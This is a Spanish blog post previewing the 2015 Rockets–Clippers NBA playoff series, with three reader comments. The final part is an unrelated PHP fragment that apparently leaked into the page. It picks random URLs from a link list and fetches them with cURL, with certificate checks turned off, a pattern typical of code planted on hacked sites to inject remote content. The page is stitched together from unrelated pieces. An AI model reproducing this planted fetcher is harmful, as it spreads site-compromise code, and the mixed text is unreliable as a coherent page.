Previa Rockets – Clippers

04 de May de 2015 por TheDeerHunter

L’Alpe d’huez que es el cuadro de playoffs en el Oeste obliga a los Clippers a visitar Houston apenas 48 horas después de haber obrado el milagro ante los pasados campeones y sin tiempo de lamerse las heridas. Los Rockets, en cambio, lograron deshacerse de Dallas con mucha mayor facilidad de lo esperado y han podido disfrutar de 5 días de descanso. Esta es la primera ventaja con la que contarán, al menos en el inicio de la eliminatoria. Harán bien en aprovecharla.

Los precedentes dan un empate a 2, que no termina de ser relevante por las ausencias en aquellos partidos de Dwight Howard, como también de Blake Griffin en un par de ellos. Por números la eliminatoria no puede presentarse más igualada. 56 victorias cada uno en la regular, idéntica fortaleza como locales, ratings ofensivos y defensivos muy similares, ritmos de juego casi calcados… De algún modo sorprende el claro favoritismo que se inclina en los medios hacia los Clippers. Quizá sea por las gratas sensaciones que han transmitido en la machada ante los Spurs, pero los Rockets también mostraron buenos mimbres en primera ronda. 

La primera variable que habrá que despejar será el estado físico de Chris Paul. Su rendimiento ha sido digno de MVP esta postemporada, siendo el contrapeso perfecto para el roto que debe esperarse que les cause James Harden. Vimos a Jamal Crawford coger la batuta del equipo en el 7º de primera ronda, pero esa no debería de ser de ningún modo la opción elegida por Doc Rivers. Crawford ya no está para grandes minutadas y entre sus virtudes jamás ha estado la distribución, mucho menos la dirección de un aspirante como éste. Llama la atención que los Clippers no hayan previsto un sustituto para Paul a estas alturas de la película. Por suerte para ellos Griffin se está sintiendo muy cómodo en el rol de “point-forward”, siendo el segundo mejor pasador del equipo casi empatado con el base.

Otra de las claves de la eliminatoria es la teórica superioridad de la segunda unidad de Houston, respecto a sus homónimos Clippers. Josh Smith y Corey Brewer se han destapado como un factor desequilibrante significativo. Por contra el quinteto titular de los angelinos se ha visto muy solo. Necesitarán mucho más que destellos de Jamal Crawford, Austin Rivers o Glenn Davis. El resto ni está ni se le espera.

En definitiva. Con Chris Paul operativo huele a nueva machada de los Clippers en 6 o 7 partidos. Apostaría mi dinero por CP3 y Griffin antes que por Harden y Howard… pero sobre todo lo apostaría por Rivers antes que por Kevin McHale. En cualquier caso se trata de una eliminatoria sin favoritismo claro, entre dos de los grandes triunfadores de la 2014/15. Nadie puede descartar que James Harden termine de dar el paso definitivo a la grandeza que aún esperamos de él y pueda llevar a los suyos a las cotas más altas. Si falla en esta serie quedará marcado para siempre como sospechoso habitual.

Comenta

3 comentarios a esta entrada

  1. charlestone dice:
    #1

    Se me escapó la porra para Playoffs (aquí me fallaron los Spurs) pero ya que estamos me mojó a favor de Houston: un 4-1 con Paul renqueante y 4-2 con el base. No confiaba en los Rockets y en especial en el Harden de playoffs pero ante Dallas me gustaron mucho, mucho (también Howard). Ale

      Citar

  2. Jose Luis dice:
    #2

    Tal como van las cosas… me da que esta es la última temporada de McHale en Houston, me parece, Les están metiendo un baño.

    Muchos jugadores que valen para regular season pero no PO. Aunque la baja de Beverley… quizá se esté notando mucho y quizá eso le salve la cabeza al coach.

      Citar

  3. Jose Luis dice:
    #3

    Motiejunas también está de baja… pero aún así, no veo nada por lo que destaque McHale, y la plantilla no es plantilla de PO.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>